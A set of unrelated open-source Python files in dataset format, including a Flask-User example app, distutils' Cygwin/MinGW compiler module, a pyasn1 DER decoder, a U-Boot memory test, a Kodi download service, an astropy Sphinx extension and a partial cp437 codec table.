""")
# The Members page is only accessible to authenticated users
@app.route('/members')
@login_required # Use of @login_required decorator
def members_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Members page</h2>
<p>This page can only be accessed by authenticated users.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
# The Special page requires a user with 'special' and 'sauce' roles or with 'special' and 'agent' roles.
@app.route('/special')
@roles_required('secret', ['sauce', 'agent']) # Use of @roles_required decorator
def special_page():
return render_template_string("""
{% extends "base.html" %}
{% block content %}
<h2>Special Page</h2>
<p>This page can only be accessed by user007.</p><br/>
<p><a href={{ url_for('home_page') }}>Home page</a> (anyone)</p>
<p><a href={{ url_for('members_page') }}>Members page</a> (login required)</p>
<p><a href={{ url_for('special_page') }}>Special page</a> (login with username 'user007' and password 'Password1')</p>
{% endblock %}
""")
return app
# Start development web server
if __name__=='__main__':
app = create_app()
app.run(host='0.0.0.0', port=5000, debug=True)
| jamescarignan/Flask-User | example_apps/user_auth_app.py | Python | bsd-2-clause | 6,986 |
"""distutils.cygwinccompiler
Provides the CygwinCCompiler class, a subclass of UnixCCompiler that
handles the Cygwin port of the GNU C compiler to Windows. It also contains
the Mingw32CCompiler class which handles the mingw32 port of GCC (same as
cygwin in no-cygwin mode).
"""
# problems:
#
# * if you use a msvc compiled python version (1.5.2)
# 1. you have to insert a __GNUC__ section in its config.h
# 2. you have to generate an import library for its dll
# - create a def-file for python??.dll
# - create an import library using
# dlltool --dllname python15.dll --def python15.def \
# --output-lib libpython15.a
#
# see also http://starship.python.net/crew/kernr/mingw32/Notes.html
#
# * We put export_symbols in a def-file, and don't use
# --export-all-symbols because it doesn't worked reliable in some
# tested configurations. And because other windows compilers also
# need their symbols specified this no serious problem.
#
# tested configurations:
#
# * cygwin gcc 2.91.57/ld 2.9.4/dllwrap 0.2.4 works
# (after patching python's config.h and for C++ some other include files)
# see also http://starship.python.net/crew/kernr/mingw32/Notes.html
# * mingw32 gcc 2.95.2/ld 2.9.4/dllwrap 0.2.4 works
# (ld doesn't support -shared, so we use dllwrap)
# * cygwin gcc 2.95.2/ld 2.10.90/dllwrap 2.10.90 works now
# - its dllwrap doesn't work, there is a bug in binutils 2.10.90
# see also http://sources.redhat.com/ml/cygwin/2000-06/msg01274.html
# - using gcc -mdll instead dllwrap doesn't work without -static because
# it tries to link against dlls instead their import libraries. (If
# it finds the dll first.)
# By specifying -static we force ld to link against the import libraries,
# this is windows standard and there are normally not the necessary symbols
# in the dlls.
# *** only the version of June 2000 shows these problems
# * cygwin gcc 3.2/ld 2.13.90 works
# (ld supports -shared)
# * mingw gcc 3.2/ld 2.13 works
# (ld supports -shared)
import os
import sys
import copy
from subprocess import Popen, PIPE, check_output
import re
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import (DistutilsExecError, CCompilerError,
CompileError, UnknownFileError)
from distutils import log
from distutils.version import LooseVersion
from distutils.spawn import find_executable
def get_msvcr():
"""Include the appropriate MSVC runtime library if Python was built
with MSVC 7.0 or later.
"""
msc_pos = sys.version.find('MSC v.')
if msc_pos != -1:
msc_ver = sys.version[msc_pos+6:msc_pos+10]
if msc_ver == '1300':
# MSVC 7.0
return ['msvcr70']
elif msc_ver == '1310':
# MSVC 7.1
return ['msvcr71']
elif msc_ver == '1400':
# VS2005 / MSVC 8.0
return ['msvcr80']
elif msc_ver == '1500':
# VS2008 / MSVC 9.0
return ['msvcr90']
elif msc_ver == '1600':
# VS2010 / MSVC 10.0
return ['msvcr100']
else:
raise ValueError("Unknown MS Compiler version %s " % msc_ver)
class CygwinCCompiler(UnixCCompiler):
""" Handles the Cygwin port of the GNU C compiler to Windows.
"""
compiler_type = 'cygwin'
obj_extension = ".o"
static_lib_extension = ".a"
shared_lib_extension = ".dll"
static_lib_format = "lib%s%s"
shared_lib_format = "%s%s"
exe_extension = ".exe"
def __init__(self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__(self, verbose, dry_run, force)
status, details = check_config_h()
self.debug_print("Python's GCC status: %s (details: %s)" %
(status, details))
if status is not CONFIG_H_OK:
self.warn(
"Python's pyconfig.h doesn't seem to support your compiler. "
"Reason: %s. "
"Compiling may fail because of undefined preprocessor macros."
% details)
self.gcc_version, self.ld_version, self.dllwrap_version = \
get_versions()
self.debug_print(self.compiler_type + ": gcc %s, ld %s, dllwrap %s\n" %
(self.gcc_version,
self.ld_version,
self.dllwrap_version) )
# ld_version >= "2.10.90" and < "2.13" should also be able to use
# gcc -mdll instead of dllwrap
# Older dllwraps had own version numbers, newer ones use the
# same as the rest of binutils ( also ld )
# dllwrap 2.10.90 is buggy
if self.ld_version >= "2.10.90":
self.linker_dll = "gcc"
else:
self.linker_dll = "dllwrap"
# ld_version >= "2.13" support -shared so use it instead of
# -mdll -static
if self.ld_version >= "2.13":
shared_option = "-shared"
else:
shared_option = "-mdll -static"
# Hard-code GCC because that's what this is all about.
# XXX optimization, warnings etc. should be customizable.
self.set_executables(compiler='gcc -mcygwin -O -Wall',
compiler_so='gcc -mcygwin -mdll -O -Wall',
compiler_cxx='g++ -mcygwin -O -Wall',
linker_exe='gcc -mcygwin',
linker_so=('%s -mcygwin %s' %
(self.linker_dll, shared_option)))
# cygwin and mingw32 need different sets of libraries
if self.gcc_version == "2.91.57":
# cygwin shouldn't need msvcrt, but without the dlls will crash
# (gcc version 2.91.57) -- perhaps something about initialization
self.dll_libraries=["msvcrt"]
self.warn(
"Consider upgrading to a newer version of gcc")
else:
# Include the appropriate MSVC runtime library if Python was built
# with MSVC 7.0 or later.
self.dll_libraries = get_msvcr()
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compiles the source by spawning GCC and windres if needed."""
if ext == '.rc' or ext == '.res':
# gcc needs '.res' and '.rc' compiled to object files !!!
try:
self.spawn(["windres", "-i", src, "-o", obj])
except DistutilsExecError as msg:
raise CompileError(msg)
else: # for other files use the C-compiler
try:
self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
def link(self, target_desc, objects, output_filename, output_dir=None,
libraries=None, library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
"""Link the objects."""
# use separate copies, so we can modify the lists
extra_preargs = copy.copy(extra_preargs or [])
libraries = copy.copy(libraries or [])
objects = copy.copy(objects or [])
# Additional libraries
libraries.extend(self.dll_libraries)
# handle export symbols by creating a def-file
# with executables this only works with gcc/ld as linker
if ((export_symbols is not None) and
(target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# (The linker doesn't do anything if output is up-to-date.
# So it would probably better to check if we really need this,
# but for this we had to insert some unchanged parts of
# UnixCCompiler, and this is not what we want.)
# we want to put some files in the same directory as the
# object files are, build_temp doesn't help much
# where are the object files
temp_dir = os.path.dirname(objects[0])
# name of dll to give the helper files the same base name
(dll_name, dll_extension) = os.path.splitext(
os.path.basename(output_filename))
# generate the filenames for these files
def_file = os.path.join(temp_dir, dll_name + ".def")
lib_file = os.path.join(temp_dir, 'lib' + dll_name + ".a")
# Generate .def file
contents = [
"LIBRARY %s" % os.path.basename(output_filename),
"EXPORTS"]
for sym in export_symbols:
contents.append(sym)
self.execute(write_file, (def_file, contents),
"writing %s" % def_file)
# next add options for def-file and to creating import libraries
# dllwrap uses different options than gcc/ld
if self.linker_dll == "dllwrap":
extra_preargs.extend(["--output-lib", lib_file])
# for dllwrap we have to use a special option
extra_preargs.extend(["--def", def_file])
# we use gcc/ld here and can be sure ld is >= 2.9.10
else:
# doesn't work: bfd_close build\...\libfoo.a: Invalid operation
#extra_preargs.extend(["-Wl,--out-implib,%s" % lib_file])
# for gcc/ld the def-file is specified as any object files
objects.append(def_file)
#end: if ((export_symbols is not None) and
# (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# who wants symbols and a many times larger output file
# should explicitly switch the debug mode on
# otherwise we let dllwrap/ld strip the output file
# (On my machine: 10KiB < stripped_file < ??100KiB
# unstripped_file = stripped_file + XXX KiB
# ( XXX=254 for a typical python extension))
if not debug:
extra_preargs.append("-s")
UnixCCompiler.link(self, target_desc, objects, output_filename,
output_dir, libraries, library_dirs,
runtime_library_dirs,
None, # export_symbols, we do this in our def-file
debug, extra_preargs, extra_postargs, build_temp,
target_lang)
# -- Miscellaneous methods -----------------------------------------
def object_filenames(self, source_filenames, strip_dir=0, output_dir=''):
"""Adds supports for rc and res files."""
if output_dir is None:
output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
base, ext = os.path.splitext(os.path.normcase(src_name))
if ext not in (self.src_extensions + ['.rc','.res']):
raise UnknownFileError("unknown file type '%s' (from '%s')" % \
(ext, src_name))
if strip_dir:
base = os.path.basename (base)
if ext in ('.res', '.rc'):
# these need to be compiled to object files
obj_names.append (os.path.join(output_dir,
base + ext + self.obj_extension))
else:
obj_names.append (os.path.join(output_dir,
base + self.obj_extension))
return obj_names
# the same as cygwin plus some additional parameters
class Mingw32CCompiler(CygwinCCompiler):
""" Handles the Mingw32 port of the GNU C compiler to Windows.
"""
compiler_type = 'mingw32'
def __init__(self, verbose=0, dry_run=0, force=0):
CygwinCCompiler.__init__ (self, verbose, dry_run, force)
# ld_version >= "2.13" support -shared so use it instead of
# -mdll -static
if self.ld_version >= "2.13":
shared_option = "-shared"
else:
shared_option = "-mdll -static"
# A real mingw32 doesn't need to specify a different entry point,
# but cygwin 2.91.57 in no-cygwin-mode needs it.
if self.gcc_version <= "2.91.57":
entry_point = '--entry _DllMain@12'
else:
entry_point = ''
if is_cygwingcc():
raise CCompilerError(
'Cygwin gcc cannot be used with --compiler=mingw32')
self.set_executables(compiler='gcc -O -Wall',
compiler_so='gcc -mdll -O -Wall',
compiler_cxx='g++ -O -Wall',
linker_exe='gcc',
linker_so='%s %s %s'
% (self.linker_dll, shared_option,
entry_point))
# Maybe we should also append -mthreads, but then the finished
# dlls need another dll (mingwm10.dll see Mingw32 docs)
# (-mthreads: Support thread-safe exception handling on `Mingw32')
# no additional libraries needed
self.dll_libraries=[]
# Include the appropriate MSVC runtime library if Python was built
# with MSVC 7.0 or later.
self.dll_libraries = get_msvcr()
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if he is using an unmodified
# version.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
"""Check if the current Python installation appears amenable to building
extensions with GCC.
Returns a tuple (status, details), where 'status' is one of the following
constants:
- CONFIG_H_OK: all is well, go ahead and compile
- CONFIG_H_NOTOK: doesn't look good
- CONFIG_H_UNCERTAIN: not sure -- unable to read pyconfig.h
'details' is a human-readable string explaining the situation.
Note there are two ways to conclude "OK": either 'sys.version' contains
the string "GCC" (implying that this Python was built with GCC), or the
installed "pyconfig.h" contains the string "__GNUC__".
"""
# XXX since this function also checks sys.version, it's not strictly a
# "pyconfig.h" check -- should probably be renamed...
from distutils import sysconfig
# if sys.version contains GCC then python was compiled with GCC, and the
# pyconfig.h file should be OK
if "GCC" in sys.version:
return CONFIG_H_OK, "sys.version mentions 'GCC'"
# let's see if __GNUC__ is mentioned in python.h
fn = sysconfig.get_config_h_filename()
try:
config_h = open(fn)
try:
if "__GNUC__" in config_h.read():
return CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn
else:
return CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn
finally:
config_h.close()
except OSError as exc:
return (CONFIG_H_UNCERTAIN,
"couldn't read '%s': %s" % (fn, exc.strerror))
RE_VERSION = re.compile(br'(\d+\.\d+(\.\d+)*)')
def _find_exe_version(cmd):
"""Find the version of an executable by running `cmd` in the shell.
If the command is not found, or the output does not match
`RE_VERSION`, returns None.
"""
executable = cmd.split()[0]
if find_executable(executable) is None:
return None
out = Popen(cmd, shell=True, stdout=PIPE).stdout
try:
out_string = out.read()
finally:
out.close()
result = RE_VERSION.search(out_string)
if result is None:
return None
# LooseVersion works with strings
# so we need to decode our bytes
return LooseVersion(result.group(1).decode())
def get_versions():
""" Try to find out the versions of gcc, ld and dllwrap.
If not possible it returns None for it.
"""
commands = ['gcc -dumpversion', 'ld -v', 'dllwrap --version']
return tuple([_find_exe_version(cmd) for cmd in commands])
def is_cygwingcc():
'''Try to determine if the gcc that would be used is from cygwin.'''
out_string = check_output(['gcc', '-dumpmachine'])
return out_string.strip().endswith(b'cygwin')
| xyuanmu/XX-Net | python3.8.2/Lib/distutils/cygwinccompiler.py | Python | bsd-2-clause | 16,478 |
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <[email protected]>
# License: http://pyasn1.sf.net/license.html
#
from pyasn1.type import univ
from pyasn1.codec.cer import decoder
__all__ = ['decode']
class BitStringDecoder(decoder.BitStringDecoder):
supportConstructedForm = False
class OctetStringDecoder(decoder.OctetStringDecoder):
supportConstructedForm = False
# TODO: prohibit non-canonical encoding
RealDecoder = decoder.RealDecoder
tagMap = decoder.tagMap.copy()
tagMap.update(
{univ.BitString.tagSet: BitStringDecoder(),
univ.OctetString.tagSet: OctetStringDecoder(),
univ.Real.tagSet: RealDecoder()}
)
typeMap = decoder.typeMap.copy()
# Put in non-ambiguous types for faster codec lookup
for typeDecoder in tagMap.values():
if typeDecoder.protoComponent is not None:
typeId = typeDecoder.protoComponent.__class__.typeId
if typeId is not None and typeId not in typeMap:
typeMap[typeId] = typeDecoder
class Decoder(decoder.Decoder):
supportIndefLength = False
#: Turns DER octet stream into an ASN.1 object.
#:
#: Takes DER octetstream and decode it into an ASN.1 object
#: (e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative) which
#: may be a scalar or an arbitrary nested structure.
#:
#: Parameters
#: ----------
#: substrate: :py:class:`bytes` (Python 3) or :py:class:`str` (Python 2)
#: DER octetstream
#:
#: asn1Spec: any pyasn1 type object e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative
#: A pyasn1 type object to act as a template guiding the decoder. Depending on the ASN.1 structure
#: being decoded, *asn1Spec* may or may not be required. Most common reason for
#: it to require is that ASN.1 structure is encoded in *IMPLICIT* tagging mode.
#:
#: Returns
#: -------
#: : :py:class:`tuple`
#: A tuple of pyasn1 object recovered from DER substrate (:py:class:`~pyasn1.type.base.PyAsn1Item` derivative)
#: and the unprocessed trailing portion of the *substrate* (may be empty)
#:
#: Raises
#: ------
#: : :py:class:`pyasn1.error.PyAsn1Error`
#: On decoding errors
decode = Decoder(tagMap, typeMap)
| saurabhbajaj207/CarpeDiem | venv/Lib/site-packages/pyasn1/codec/der/decoder.py | Python | mit | 2,169 |
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2015 Stephen Warren
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
import pytest
import u_boot_utils
@pytest.mark.buildconfigspec('cmd_memory')
def test_md(u_boot_console):
"""Test that md reads memory as expected, and that memory can be modified
using the mw command."""
ram_base = u_boot_utils.find_ram_base(u_boot_console)
addr = '%08x' % ram_base
val = 'a5f09876'
expected_response = addr + ': ' + val
u_boot_console.run_command('mw ' + addr + ' 0 10')
response = u_boot_console.run_command('md ' + addr + ' 10')
assert(not (expected_response in response))
u_boot_console.run_command('mw ' + addr + ' ' + val)
response = u_boot_console.run_command('md ' + addr + ' 10')
assert(expected_response in response)
@pytest.mark.buildconfigspec('cmd_memory')
def test_md_repeat(u_boot_console):
"""Test command repeat (via executing an empty command) operates correctly
for "md"; the command must repeat and dump an incrementing address."""
ram_base = u_boot_utils.find_ram_base(u_boot_console)
addr_base = '%08x' % ram_base
words = 0x10
addr_repeat = '%08x' % (ram_base + (words * 4))
u_boot_console.run_command('md %s %x' % (addr_base, words))
response = u_boot_console.run_command('')
expected_response = addr_repeat + ': '
assert(expected_response in response)
| Digilent/u-boot-digilent | test/py/tests/test_md.py | Python | gpl-2.0 | 1,426 |
# -*- coding: utf-8 -*-
import sys
import json
import binascii
import xbmc
from lib.yd_private_libs import util, servicecontrol, jsonqueue
sys.path.insert(0, util.MODULE_PATH)
import YDStreamExtractor # noqa E402
import threading # noqa E402
class Service(xbmc.Monitor):
def __init__(self):
self.downloadCount = 0
self.controller = servicecontrol.ServiceControl()
self.start()
def onNotification(self, sender, method, data):
if not sender == 'script.module.youtube.dl':
return
self.processCommand(method.split('.', 1)[-1], self.controller.processCommandData(data)) # Remove the "Other." prefix
def processCommand(self, command, args):
if command == 'DOWNLOAD_STOP':
YDStreamExtractor._cancelDownload()
def getNextQueuedDownload(self):
try:
dataHEX = jsonqueue.XBMCJsonRAFifoQueue(util.QUEUE_FILE).pop()
if not dataHEX:
return None
dataJSON = binascii.unhexlify(dataHEX)
self.downloadCount += 1
util.LOG('Loading from queue. #{0} this session'.format(self.downloadCount))
return json.loads(dataJSON)
except:
import traceback
traceback.print_exc()
return None
def start(self):
if self.controller.status == 'ACTIVE':
return
try:
self.controller.status = 'ACTIVE'
self._start()
finally:
self.controller.status = ''
def _start(self):
util.LOG('DOWNLOAD SERVICE: START')
info = self.getNextQueuedDownload()
while info and not xbmc.abortRequested:
t = threading.Thread(target=YDStreamExtractor._handleDownload, args=(
info['data'],), kwargs={'path': info['path'], 'duration': info['duration'], 'bg': True})
t.start()
while t.isAlive() and not xbmc.abortRequested:
xbmc.sleep(100)
info = self.getNextQueuedDownload()
util.LOG('DOWNLOAD SERVICE: FINISHED')
Service()
| mrquim/mrquimrepo | script.module.youtube.dl/service.py | Python | gpl-2.0 | 2,091 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This sphinx extension builds off of `sphinx.ext.autosummary` to
clean up some issues it presents in the Astropy docs.
The main issue this fixes is the summary tables getting cut off before the
end of the sentence in some cases.
Note: Sphinx 1.2 appears to have fixed the the main issues in the stock
autosummary extension that are addressed by this extension. So use of this
extension with newer versions of Sphinx is deprecated.
"""
import re
from distutils.version import LooseVersion
import sphinx
from sphinx.ext.autosummary import Autosummary
from ...utils import deprecated
# used in AstropyAutosummary.get_items
_itemsummrex = re.compile(r'^([A-Z].*?\.(?:\s|$))')
@deprecated('1.0', message='AstropyAutosummary is only needed when used '
'with Sphinx versions less than 1.2')
class AstropyAutosummary(Autosummary):
def get_items(self, names):
"""Try to import the given names, and return a list of
``[(name, signature, summary_string, real_name), ...]``.
"""
from sphinx.ext.autosummary import (get_import_prefixes_from_env,
import_by_name, get_documenter, mangle_signature)
env = self.state.document.settings.env
prefixes = get_import_prefixes_from_env(env)
items = []
max_item_chars = 50
for name in names:
display_name = name
if name.startswith('~'):
name = name[1:]
display_name = name.split('.')[-1]
try:
import_by_name_values = import_by_name(name, prefixes=prefixes)
except ImportError:
self.warn('[astropyautosummary] failed to import %s' % name)
items.append((name, '', '', name))
continue
# to accommodate Sphinx v1.2.2 and v1.2.3
if len(import_by_name_values) == 3:
real_name, obj, parent = import_by_name_values
elif len(import_by_name_values) == 4:
real_name, obj, parent, module_name = import_by_name_values
# NB. using real_name here is important, since Documenters
# handle module prefixes slightly differently
documenter = get_documenter(obj, parent)(self, real_name)
if not documenter.parse_name():
self.warn('[astropyautosummary] failed to parse name %s' % real_name)
items.append((display_name, '', '', real_name))
continue
if not documenter.import_object():
self.warn('[astropyautosummary] failed to import object %s' % real_name)
items.append((display_name, '', '', real_name))
continue
# -- Grab the signature
sig = documenter.format_signature()
if not sig:
sig = ''
else:
max_chars = max(10, max_item_chars - len(display_name))
sig = mangle_signature(sig, max_chars=max_chars)
sig = sig.replace('*', r'\*')
# -- Grab the summary
doc = list(documenter.process_doc(documenter.get_doc()))
while doc and not doc[0].strip():
doc.pop(0)
m = _itemsummrex.search(" ".join(doc).strip())
if m:
summary = m.group(1).strip()
elif doc:
summary = doc[0].strip()
else:
summary = ''
items.append((display_name, sig, summary, real_name))
return items
def setup(app):
# need autosummary, of course
app.setup_extension('sphinx.ext.autosummary')
# Don't make the replacement if Sphinx is at least 1.2
if LooseVersion(sphinx.__version__) < LooseVersion('1.2.0'):
# this replaces the default autosummary with the astropy one
app.add_directive('autosummary', AstropyAutosummary)
| Jerryzcn/Mmani | doc/sphinxext/numpy_ext/astropyautosummary.py | Python | bsd-2-clause | 3,983 |
""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp437',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00ff, # LATIN SMALL LETTER Y WITH DIAERESIS
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00a5, # YEN SIGN
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
